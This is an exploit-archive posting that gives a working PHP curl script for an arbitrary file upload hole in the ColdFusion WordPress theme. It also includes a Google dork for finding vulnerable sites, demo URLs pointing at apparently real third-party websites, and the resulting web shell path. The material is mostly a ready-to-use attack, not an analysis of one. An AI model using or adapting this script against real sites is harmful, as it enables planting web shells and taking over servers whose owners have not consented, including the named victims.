Home / exploitsPDF  

WordPress Cold Fusion theme Arbitrary File Upload Vulnerability

Posted on 01 November 2013

############################################################### # Exploit Title: WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability # Author: Smail Max # Date: 10/31/2013 # Vendor Homepage: http://themeforest.net/ # Themes Link: http://themeforest.net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748 # Google dork: inurl:wp-content/themes/ColdFusion/ ############################################################### = = = = = = = = 1)Exploit = 2)Real Demo = = = = = = = = = 1)Exploit : = = = = = = <?php $uploadfile="YourFile.php"; $ch = curl_init("http://[Target]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> 2) Exploit demo : = = = = = = = = = http://www.laughinXgcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php http://www.alias-phXoto.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php http://www.manueXl-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php # #### #### #### #### #### #### #### #### # Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php # #### #### #### #### #### #### #### #### # # Facebook Profile : www.fb.com/smailmax # E-mail : ur0@hotmail.com # #### #### #### #### #### #### #### #### # ##### Fi Khatr : > Smail Fox, Ped Rou, &#348;im&#245;&#245;w Any ##### ##### Safouane Saw, RootMax, DrShano, Novice Exe ##### ##### Abdelaziz Babiz, Youness El Amri, Salah Soultan ##### ##### Âh M&#234;d, Docteur Vir&#249;s, Le-MîSst&#232;r T&#224;riik ##### ##### Sam7o Li Ila Nsit Chi Wa7d :( ./Smail Max ##### ##### W A L I D A <3 #####

 

TOP